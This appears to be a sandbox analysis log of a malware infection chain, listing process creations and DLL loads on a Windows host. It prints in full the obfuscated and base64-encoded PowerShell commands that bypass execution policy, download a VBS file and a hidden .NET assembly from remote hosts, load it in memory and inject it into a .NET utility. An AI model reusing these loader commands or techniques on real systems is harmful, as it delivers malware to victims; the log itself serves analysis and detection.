Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wihaduv C:\Users\user\AppData\Roaming\wihaduv
Source: C:\Users\user\AppData\Roaming\wihaduv	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4232 -s 704
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
